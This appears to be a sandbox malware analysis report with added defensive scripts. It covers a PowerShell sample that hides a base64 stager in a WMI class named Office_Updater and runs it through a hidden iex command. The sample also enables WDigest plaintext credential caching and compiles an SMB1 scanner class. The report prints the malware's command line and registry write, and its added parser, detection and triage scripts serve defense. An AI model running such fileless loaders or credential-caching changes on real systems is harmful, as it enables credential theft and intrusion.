    C:\Users\user\Desktop>"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /o
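The byte array that powershell.exe writes into rjax4qnu.0.cs (field part1 of class m17sc in namespace PingCastle.Scanners) is the start of an SMB1 request: a NetBIOS session header followed by the fixed SMB header. The parser below is an added example, not part of the Joe Sandbox report and not code from the compiled class; it decodes that header so the command and flag bits can be read directly. The bytes are transcribed from the File Written dump above, which stops inside the 8-byte signature field, so the remaining header fields (Reserved, TID, PIDLow, UID, MID) are zero-filled here as an assumption.

```python
"""Decode the SMB1 request header embedded in the dropped C# source.

Added example, not part of the Joe Sandbox report and not code from the
compiled PingCastle.Scanners.m17sc class. The bytes below are transcribed
from the report's File Written dump of rjax4qnu.0.cs (the part1 literal):
a 4-byte NetBIOS session header followed by the first 22 bytes of an SMB1
header. The dump stops inside the 8-byte signature field, so Reserved, TID,
PIDLow, UID and MID are zero-filled here as an assumption.
"""
import struct

# Transcribed from the report (constructed input, not captured traffic).
PART1_FROM_REPORT = bytes([
    0x00, 0x00, 0x00, 0x00,                          # NetBIOS: type 0x00, length 0 in the literal
    0xff, 0x53, 0x4d, 0x42,                          # protocol id "\xffSMB"
    0x75,                                            # command
    0x00, 0x00, 0x00, 0x00,                          # status (DOS error class/code or NTSTATUS)
    0x18,                                            # flags
    0x01, 0x28,                                      # flags2, little-endian
    0x00, 0x00,                                      # PIDHigh
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  # SecurityFeatures (dump cuts off here)
])
# Reserved(2) + TID(2) + PIDLow(2) + UID(2) + MID(2): not on the page, assumed zero.
ASSUMED_TAIL = bytes(10)

SMB1_COMMANDS = {
    0x25: "SMB_COM_TRANSACTION", 0x32: "SMB_COM_TRANSACTION2",
    0x72: "SMB_COM_NEGOTIATE", 0x73: "SMB_COM_SESSION_SETUP_ANDX",
    0x75: "SMB_COM_TREE_CONNECT_ANDX", 0xa2: "SMB_COM_NT_CREATE_ANDX",
}
FLAGS_BITS = {0x08: "CASE_INSENSITIVE", 0x10: "CANONICALIZED_PATHS", 0x80: "REPLY"}
FLAGS2_BITS = {
    0x0001: "LONG_NAMES", 0x0004: "SECURITY_SIGNATURE", 0x0800: "EXTENDED_SECURITY",
    0x1000: "DFS", 0x2000: "PAGING_IO", 0x4000: "NT_STATUS", 0x8000: "UNICODE",
}


def parse_smb1(pkt: bytes) -> dict:
    """Parse a NetBIOS session header plus the 32-byte SMB1 header ([MS-CIFS] 2.2.3.1)."""
    if len(pkt) < 36:
        raise ValueError("need 4 NetBIOS + 32 SMB header bytes, got %d" % len(pkt))
    nb_type, nb_len = pkt[0], int.from_bytes(pkt[1:4], "big")
    hdr = pkt[4:36]
    if hdr[:4] != b"\xffSMB":
        raise ValueError("not an SMB1 header")
    # Header offsets: Command@4, Status@5, Flags@9, Flags2@10, PIDHigh@12,
    # SecurityFeatures@14, Reserved@22, TID@24, PIDLow@26, UID@28, MID@30.
    cmd, status, flags, flags2, pid_high = struct.unpack_from("<BIBHH", hdr, 4)
    signature = hdr[14:22]
    tid, pid_low, uid, mid = struct.unpack_from("<HHHH", hdr, 24)
    return {
        "netbios_type": nb_type,
        "netbios_length": nb_len,
        "command": SMB1_COMMANDS.get(cmd, "0x%02x" % cmd),
        "status": status,
        "flags": [name for bit, name in FLAGS_BITS.items() if flags & bit],
        "flags2": [name for bit, name in FLAGS2_BITS.items() if flags2 & bit],
        "signed": any(signature),
        "tid": tid,
        "pid": (pid_high << 16) | pid_low,
        "uid": uid,
        "mid": mid,
    }


if __name__ == "__main__":
    for key, value in parse_smb1(PART1_FROM_REPORT + ASSUMED_TAIL).items():
        print("%-15s %s" % (key, value))
```

On the report's bytes this yields command 0x75 (SMB_COM_TREE_CONNECT_ANDX), flags CASE_INSENSITIVE and CANONICALIZED_PATHS, flags2 0x2801 (LONG_NAMES, EXTENDED_SECURITY, PAGING_IO) and an all-zero signature, i.e. an unsigned SMB1 tree-connect request hard-coded in the scanner; the same field values can be matched in a network signature if the compiled scanner is ever run against internal hosts.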

Registry Activities

Key Value Created

Key Path | Name | Type | Data | Completion | Count | Address | Symbol
H KEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest | UseLogonCredential | dword | 1 | success or wait | 1 | 1A137EA | RegSetValueExW
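The process tree in the Startup section and the registry write above together describe the chain a detection engineer would want to alert on: a hidden, non-interactive powershell.exe that pulls its payload from a static property of the WMI class root\default:Office_Updater, base64-decodes it and passes it to iex; csc.exe compiling C# under powershell.exe; powercfg.exe disabling standby and hibernation; schtasks.exe deleting the task yastcat; netstat enumerating connections; and UseLogonCredential=1 under WDigest, which makes LSASS keep plaintext logon credentials in memory for later dumping. The script below is an added example, not Joe Sandbox output: it transcribes those records into Sysmon-style events and scores them with rules that mirror the report's own signatures. The class name in the Base64 call of PID 3464 is written out as System.Convert (the class that defines FromBase64String); the report's rendering drops it.

```python
"""Detection rules over the process tree and registry write in this report.

Added example, not Joe Sandbox output. The events below are constructed by
transcribing the Startup section (PID, parent PID, image, command line) and
the WDigest registry write into Sysmon-style records; each rule mirrors one
of the signatures the report fired. The class name in the Base64 call of
PID 3464 is written out as System.Convert, the class that defines
FromBase64String; the report's rendering drops it.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class RegEvent:
    pid: int
    key: str
    name: str
    data: int


PS_WMI_CMD = (
    "powershell.exe -NoP -NonI -W Hidden "
    "$mon = ([WmiClass] 'root\\default:Office_Updater').Properties['mon'].Value;"
    "$funs = ([WmiClass] 'root\\default:Office_Updater').Properties['funs'].Value;"
    "iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));"
    "Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"
)

# Constructed from the report's Startup section; image paths shortened to file names.
PROCS = [
    ProcEvent(3084, 2836, "powershell.exe",
              "powershell.exe -noLogo -ExecutionPolicy unrestricted -file C:\\Users\\user\\Desktop\\in3.ps1"),
    ProcEvent(3356, 3084, "schtasks.exe", "schtasks.exe /delete /tn yastcat /f"),
    ProcEvent(3368, 3084, "powercfg.exe", "powercfg.exe /CHANGE -standby-timeout-ac 0"),
    ProcEvent(3376, 3084, "powercfg.exe", "powercfg.exe /CHANGE -hibernate-timeout-ac 0"),
    ProcEvent(3384, 3084, "powercfg.exe",
              "powercfg.exe -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e "
              "4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000"),
    ProcEvent(3392, 3084, "NETSTAT.EXE", "NETSTAT.EXE -anop tcp"),
    ProcEvent(3416, 3084, "csc.exe",
              "csc.exe /noconfig /fullpaths @C:\\Users\\user\\AppData\\Local\\Temp\\rjax4qnu.cmdline"),
    ProcEvent(3424, 3416, "cvtres.exe", "cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"),
    ProcEvent(3440, 3084, "NETSTAT.EXE", "NETSTAT.EXE -anop tcp"),
    ProcEvent(3464, 3084, "powershell.exe", PS_WMI_CMD),
    ProcEvent(3552, 3464, "csc.exe",
              "csc.exe /noconfig /fullpaths @C:\\Users\\user\\AppData\\Local\\Temp\\oyswbnum.cmdline"),
    ProcEvent(3564, 3552, "cvtres.exe", "cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"),
    ProcEvent(3596, 3084, "NETSTAT.EXE", "NETSTAT.EXE -anop tcp"),
]
# Constructed from the report's Key Value Created row for PID 3084.
REGS = [RegEvent(3084, r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest",
                 "UseLogonCredential", 1)]


def ancestor_images(pid, procs):
    """Lower-cased image names of pid's ancestors, nearest first, within the event set."""
    by_pid = {p.pid: p for p in procs}
    cur = by_pid.get(pid)
    while cur is not None and cur.ppid in by_pid:
        cur = by_pid[cur.ppid]
        yield cur.image.lower()


def detect(procs, regs):
    """Return sorted (rule, pid) findings; each rule mirrors a signature in the report."""
    findings = set()
    for p in procs:
        img, cmd, low = p.image.lower(), p.cmdline, p.cmdline.lower()
        if img == "powershell.exe":
            # Hidden, non-interactive, no-profile launch: two or more of the switches.
            if len(re.findall(r"-(?:nop|noni|w\s+hidden)\b", low)) >= 2:
                findings.add(("ps_hidden_noninteractive", p.pid))
            # Payload pulled from a static WMI class property, base64-decoded, then IEX'd.
            if ("[wmiclass]" in low and ".properties[" in low and "frombase64string" in low
                    and re.search(r"\biex\b|invoke-expression", low)):
                findings.add(("ps_wmi_stored_payload", p.pid))
            if len(cmd) > 256:
                findings.add(("ps_very_long_cmdline", p.pid))
        elif img == "csc.exe" and "powershell.exe" in ancestor_images(p.pid, procs):
            findings.add(("csc_spawned_by_powershell", p.pid))
        elif img == "powercfg.exe" and re.search(
                r"-(?:standby|hibernate)-timeout-ac\s+0\b|-setacvalueindex", low):
            findings.add(("powercfg_keep_awake", p.pid))
        elif img == "schtasks.exe" and "/delete" in low:
            findings.add(("schtasks_delete", p.pid))
        elif img == "netstat.exe" and any(
                set("ano") <= set(arg[1:]) for arg in low.split() if arg.startswith("-")):
            findings.add(("netstat_recon", p.pid))
    for r in regs:
        # UseLogonCredential=1 makes WDigest keep plaintext logon credentials in LSASS.
        if (r.key.lower().endswith(r"securityproviders\wdigest")
                and r.name.lower() == "uselogoncredential" and r.data == 1):
            findings.add(("wdigest_cleartext_creds_enabled", r.pid))
    return sorted(findings)


if __name__ == "__main__":
    for rule, pid in detect(PROCS, REGS):
        print("%-34s pid %d" % (rule, pid))
```

Run against the transcribed events this produces thirteen findings: both csc.exe instances (3416 and 3552) have powershell.exe as an ancestor, all three powercfg.exe and all three NETSTAT.EXE invocations fire, PID 3464 trips the hidden-launch, WMI-stored-payload and very-long-command-line rules at once, and the WDigest write is attributed to PID 3084. The parent-chain walk is what makes the csc.exe rule hold up in practice: PID 3552 is compiled by the second powershell.exe, so matching only on the immediate parent would still catch it here, but an extra intermediate process would not change the verdict.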

Analysis Process: schtasks.exe PID: 3356 Parent PID: 3084

General

Start time: 04:06:19 Start date: 24/01/2018 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\schtasks.exe' /delete /tn yastcat /f Imagebase: 0x774a0000 File size: 179712 bytes MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3 Programmed in: C, C++ or other language Reputation: low

Analysis Process: powercfg.exe PID: 3368 Parent PID: 3084

General

Start time: 04:06:19
Start date: 24/01/2018
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\powercfg.exe' /CHANGE -standby-timeout-ac 0
Imagebase: 0x74150000
File size: 59392 bytes
MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F
Programmed in: C, C++ or other language
Reputation: low

Analysis Process: powercfg.exe PID: 3376 Parent PID: 3084

General

Start time: 04:06:19
Start date: 24/01/2018
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\powercfg.exe' /CHANGE -hibernate-timeout-ac 0
Imagebase: 0x74150000
File size: 59392 bytes
MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F
Programmed in: C, C++ or other language
Reputation: low

Analysis Process: powercfg.exe PID: 3384 Parent PID: 3084

General

Start time: 04:06:20
Start date: 24/01/2018
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
Imagebase: 0x74150000
File size: 59392 bytes
MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F
Programmed in: C, C++ or other language
Reputation: low

The three GUIDs are the Balanced power scheme, its "Power buttons and lid" subgroup and the "Lid close action" setting; index 000 selects "Do nothing". Together with the two timeouts set to 0 above, this keeps the host awake on AC power while the payload runs.

Analysis Process: NETSTAT.EXE PID: 3392 Parent PID: 3084

General

Start time: 04:06:20
Start date: 24/01/2018
Path: C:\Windows\System32\NETSTAT.EXE
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp
Imagebase: 0x74d60000
File size: 27136 bytes
MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561
Programmed in: C, C++ or other language
Reputation: low


Analysis Process: csc.exe PID: 3416 Parent PID: 3084

General

Start time: 04:06:23
Start date: 24/01/2018
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline'
Imagebase: 0x75a90000
File size: 77960 bytes
MD5 hash: 0A1C81BDCB030222A0B0A652B2C89D8D
Programmed in: .Net C# or VB.NET
Reputation: low


Analysis Process: cvtres.exe PID: 3424 Parent PID: 3416

General

Start time: 04:06:23
Start date: 24/01/2018
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES27A9.tmp' 'c:\Users\user\AppData\Local\Temp\CSC278A.tmp'
Imagebase: 0x752a0000
File size: 32912 bytes
MD5 hash: 200FC355F85ECD4DB77FB3CAB2D01364
Programmed in: C, C++ or other language
Reputation: low


Analysis Process: NETSTAT.EXE PID: 3440 Parent PID: 3084

General

Start time: 04:06:24
Start date: 24/01/2018
Path: C:\Windows\System32\NETSTAT.EXE
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp
Imagebase: 0x74d60000
File size: 27136 bytes
MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561
Programmed in: C, C++ or other language
Reputation: low

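The child processes listed above (schtasks.exe /delete, three powercfg.exe calls, NETSTAT.EXE -anop tcp, csc.exe compiling a .cmdline response file from %TEMP%) all share the same parent, which makes the chain a usable hunting signature in process-creation telemetry. The following script is an added example, not part of the Joe Sandbox report or of the analysed sample: it reads Sysmon Event ID 1 records from the local log, keeps the children of powershell.exe whose command lines match the behaviours recorded in this report, and scores each parent by how many distinct behaviours it spawned. The Sysmon log name and EventData field names are the standard ones; the score threshold and the 20000-event window are assumptions.

```powershell
# Added hunting script; it is not part of the Joe Sandbox report or of the
# analysed sample. It reads Sysmon process-creation events (Event ID 1) from
# the local log and groups, per powershell.exe parent, the children that match
# the chain this report records: schtasks.exe /delete, powercfg.exe disabling
# standby, hibernation and the lid action, NETSTAT.EXE -anop tcp and csc.exe
# compiling a .cmdline response file from %TEMP%. Log and field names are the
# standard Sysmon ones; the score threshold is an assumption.
param(
    [string]$LogName   = 'Microsoft-Windows-Sysmon/Operational',
    [int]   $MaxEvents = 20000,
    [int]   $MinScore  = 3     # assumption: report a parent once 3 distinct behaviours are seen
)

# One predicate per child image, taken from the command lines in the report.
# csc.exe on its own is noise (Add-Type produces the same call), hence the scoring.
$behaviours = @{
    'schtasks.exe' = { param($cl) $cl -match '/delete' }
    'powercfg.exe' = { param($cl) ($cl -match '-(standby|hibernate)-timeout-ac\s+0') -or ($cl -match '-SetAcValueIndex') }
    'netstat.exe'  = { param($cl) $cl -match '-anop\s+tcp' }
    'csc.exe'      = { param($cl) $cl -match '@.*\\Temp\\[^\\]+\.cmdline' }
}

function Get-SysmonField {
    # Read a named EventData field from the event XML; the Properties[] index
    # order changes between Sysmon versions, the element names do not.
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event, [string]$Name)
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

$events = Get-WinEvent -FilterHashtable @{ LogName = $LogName; Id = 1 } -MaxEvents $MaxEvents -ErrorAction Stop

$byParent = @{}
foreach ($e in $events) {
    $parentImage = Get-SysmonField $e 'ParentImage'
    if ($parentImage -notmatch '\\powershell\.exe$') { continue }

    $imagePath = Get-SysmonField $e 'Image'
    if (-not $imagePath) { continue }
    $image = [IO.Path]::GetFileName($imagePath).ToLower()
    if (-not $behaviours.ContainsKey($image)) { continue }

    $cl = Get-SysmonField $e 'CommandLine'
    if (-not (& $behaviours[$image] $cl)) { continue }

    # ParentProcessGuid is unique per process instance; PIDs are reused.
    $key = Get-SysmonField $e 'ParentProcessGuid'
    if (-not $byParent.ContainsKey($key)) {
        $byParent[$key] = @{
            ParentPid = (Get-SysmonField $e 'ParentProcessId')
            Parent    = $parentImage
            Hits      = @()
        }
    }
    $byParent[$key].Hits += "$image $cl"
}

foreach ($entry in $byParent.Values) {
    # Count distinct child images, so three powercfg calls still score once.
    $distinct = @($entry.Hits | ForEach-Object { ($_ -split ' ', 2)[0] } | Sort-Object -Unique).Count
    if ($distinct -ge $MinScore) {
        [pscustomobject]@{
            ParentPid = $entry.ParentPid
            Parent    = $entry.Parent
            Score     = $distinct
            Children  = ($entry.Hits -join "`n")
        }
    }
}
```

Run it elevated on a host with Sysmon process-creation logging enabled. Scoring on distinct child images rather than on any single match is deliberate: csc.exe under powershell.exe is what every Add-Type call looks like, and netstat alone is routine, but a PowerShell parent that also disables standby and deletes a scheduled task within the same lifetime is the pattern this report records.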

Analysis Process: powershell.exe PID: 3464 Parent PID: 3084

General

Start time: 04:06:24
Start date: 24/01/2018
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden '$mon = ([WmiClass] 'root\default:Office_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')'
Imagebase: 0x774a0000
File size: 452608 bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Programmed in: .Net C# or VB.NET
Reputation: low

This child reads its stager from class-level properties of the custom WMI class root\default:Office_Updater rather than from a file: 'funs' is a base64-encoded script that is decoded and passed to iex, and 'mon' is handed to $RemoteScriptBlock. The command line never defines $RemoteScriptBlock, so it must be created by the decoded 'funs' script; the report does not show that script's body.

File Activities

File Created

File Path | Access | Attributes | Options | Completion | Count | Address | Symbol
C:\Users\user\AppData\Local\Temp\oyswbnum.tmp | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 172064F | CreateFileW
C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 172064F | CreateFileW
C:\Users\user\AppData\Local\Temp\oyswbnum.dll | read attributes and synchronize and generic read and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 172064F | CreateFileW
C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 172064F | CreateFileW
C:\Users\user\AppData\Local\Temp\oyswbnum.out | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 172064F | CreateFileW
C:\Users\user\AppData\Local\Temp\oyswbnum.err | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 172064F | CreateFileW

This file set (a random eight-character base name under %TEMP% with .0.cs, .cmdline, .out, .err, .dll and .pdb) is what PowerShell's Add-Type produces when it compiles inline C# through CodeDom; the source is written, csc.exe is run against the .cmdline response file, the assembly is loaded, and the files are deleted again.

File Deleted

File Path | Completion | Count | Address | Symbol
C:\Users\user\AppData\Local\Temp\oyswbnum.dll | success or wait | 1 | 17201D2 | DeleteFileW
C:\Users\user\AppData\Local\Temp\oyswbnum.pdb | success or wait | 1 | 17201D2 | DeleteFileW
C:\Users\user\AppData\Local\Temp\oyswbnum.out | success or wait | 1 | 17201D2 | DeleteFileW
C:\Users\user\AppData\Local\Temp\oyswbnum.err | success or wait | 1 | 17201D2 | DeleteFileW
C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline | success or wait | 1 | 17201D2 | DeleteFileW
C:\Users\user\AppData\Local\Temp\oyswbnum.tmp | success or wait | 1 | 17201D2 | DeleteFileW
C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs | success or wait | 1 | 17201D2 | DeleteFileW


File Written

File Path: C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs
Offset: unknown  Length: 4096  Completion: success or wait  Count: 1  Address: 1720807  Symbol: WriteFile
Content (UTF-8 with BOM; the report shows the first part only):
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;

namespace PingCastle.Scanners
{
	public class m17sc
	{
		static public bool Scan(stri

File Path: C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs
Offset: unknown  Length: 1730  Completion: success or wait  Count: 1  Address: 1720807  Symbol: WriteFile
Content (the report shows the first part only):
der = new BinaryReader(ms);
			byte[] part1 = new byte[] {
				0x00,0x00,0x00,0x00,
				0xff,0x53,0x4d,0x42,
				0x75,
				0x00,
				0x00,
				0x00,0x00,
				0x18,
				0x01,0x28,
				0x00,0x00,
				0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x

The bytes 0xff,0x53,0x4d,0x42 are the ASCII sequence \xFFSMB that opens every SMB1 message header, so the compiled class (namespace PingCastle.Scanners, class m17sc, method Scan) hand-builds SMB1 packets over System.Net.Sockets rather than going through the Windows SMB client.

File Path: C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline
Offset: unknown  Length: 327  Completion: success or wait  Count: 1  Address: 1720807  Symbol: WriteFile
Content (UTF-8 with BOM):
/t:library /utf8output /R:"System.dll" /R:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:"C:\Users\user\AppData\Local\Temp\oyswbnum.dll" /D:DEBUG /debug+ /optimize-

File Path: C:\Users\user\AppData\Local\Temp\oyswbnum.out
Offset: unknown  Length: 422  Completion: success or wait  Count: 1  Address: 1720807  Symbol: WriteFile
Content (UTF-8 with BOM; the report shows the first part only):
C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /o
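Two of the artefacts in this report live outside the process tree and outlast it: the stager stored as class-level properties of the WMI class root\default:Office_Updater, which the powershell.exe command line above (PID 3464) reads through [WmiClass], and the WDigest UseLogonCredential value set to 1 in the Registry Activities section. The script below is an added triage example, not part of the Joe Sandbox report or of the analysed sample; it looks for both on a host. It requires Windows PowerShell 5.1 (Get-WmiObject) and administrator rights. The blob-length threshold and the -Remediate switch are assumptions, not behaviour the report describes.

```powershell
# Added triage script; it is not part of the Joe Sandbox report or of the
# analysed sample. It checks a host for the two artefacts the report records
# outside the process tree: a custom WMI class in root\default whose class-level
# properties hold base64 payload blobs (the sample reads 'mon' and 'funs' from
# root\default:Office_Updater and runs iex on the decoded 'funs'), and
# WDigest\UseLogonCredential = 1. Run as an administrator under Windows
# PowerShell 5.1 (Get-WmiObject). The blob-length threshold and the -Remediate
# switch are assumptions, not behaviour described in the report.
param(
    [string]$Namespace     = 'root\default',
    [int]   $MinBlobLength = 200,    # assumption: a stager blob is far longer than ordinary defaults
    [switch]$Remediate
)

function Test-Base64Blob {
    param([string]$Value)
    if ([string]::IsNullOrEmpty($Value) -or $Value.Length -lt $MinBlobLength) { return $false }
    if ($Value -notmatch '^[A-Za-z0-9+/=\s]+$') { return $false }
    try { [void][Convert]::FromBase64String($Value); return $true } catch { return $false }
}

# 1. Custom WMI classes used as a payload store. Class-level property values
#    are kept in the WMI repository, survive reboots and are readable by any
#    local user; nothing on disk is needed once the stager is in there.
$suspectClasses = New-Object System.Collections.Generic.List[string]
$classes = Get-WmiObject -Namespace $Namespace -List |
    Where-Object { $_.Name -notlike '__*' -and $_.Name -notlike 'CIM_*' }

foreach ($class in $classes) {
    foreach ($prop in $class.Properties) {
        if ($prop.Value -is [string] -and (Test-Base64Blob $prop.Value)) {
            $decoded = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($prop.Value))
            $flat    = $decoded -replace '\s+', ' '
            [pscustomobject]@{
                Indicator = 'WMI payload store'
                Location  = '{0}:{1}.{2}' -f $Namespace, $class.Name, $prop.Name
                Length    = $prop.Value.Length
                Preview   = $flat.Substring(0, [Math]::Min(120, $flat.Length))
            }
            if (-not $suspectClasses.Contains($class.Name)) { $suspectClasses.Add($class.Name) }
        }
    }
}
if ($Remediate) {
    foreach ($name in $suspectClasses) {
        # Deleting the class removes every blob it carries; capture the preview first.
        ([wmiclass]('{0}:{1}' -f $Namespace, $name)).Delete()
    }
}

# 2. WDigest credential caching. With UseLogonCredential = 1 LSASS keeps a
#    plaintext copy of each interactive logon password, which credential
#    dumping then recovers; 0 (or no value) is the hardened default on
#    Windows 8.1 and later and on older systems with KB2871997 installed.
foreach ($cs in 'CurrentControlSet', 'ControlSet001') {
    $key = "HKLM:\SYSTEM\$cs\Control\SecurityProviders\WDigest"
    $val = (Get-ItemProperty -Path $key -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential
    if ($val -eq 1) {
        [pscustomobject]@{
            Indicator = 'WDigest plaintext caching'
            Location  = "$key\UseLogonCredential"
            Length    = $null
            Preview   = 'UseLogonCredential = 1'
        }
        if ($Remediate) { Set-ItemProperty -Path $key -Name UseLogonCredential -Value 0 -Type DWord }
    }
}
```

Without -Remediate the script only reports, which is what you want during an investigation: the decoded preview of each blob tells you whether a class such as Office_Updater is carrying script or a binary, and the class should be exported before it is deleted. Checking ControlSet001 as well as CurrentControlSet matters because the sample wrote the WDigest value to ControlSet001 directly.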

Analysis Process: csc.exe PID: 3552 Parent PID: 3464

General

Start time: 04:06:42
Start date: 24/01/2018
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline'
Imagebase: 0x74db0000
File size: 77960 bytes
MD5 hash: 0A1C81BDCB030222A0B0A652B2C89D8D
Programmed in: .Net C# or VB.NET
Reputation: low

Analysis Process: cvtres.exe PID: 3564 Parent PID: 3552

General

Start time: 04:06:43
Start date: 24/01/2018
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES760E.tmp' 'c:\Users\user\AppData\Local\Temp\CSC75BC.tmp'
Imagebase: 0x752a0000
File size: 32912 bytes
MD5 hash: 200FC355F85ECD4DB77FB3CAB2D01364
Programmed in: C, C++ or other language
Reputation: low

Analysis Process: NETSTAT.EXE PID: 3596 Parent PID: 3084

General

Start time: 04:06:47
Start date: 24/01/2018
Path: C:\Windows\System32\NETSTAT.EXE
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp
Imagebase: 0x6e510000
File size: 27136 bytes
MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561
Programmed in: C, C++ or other language
Reputation: low

Disassembly

Code Analysis
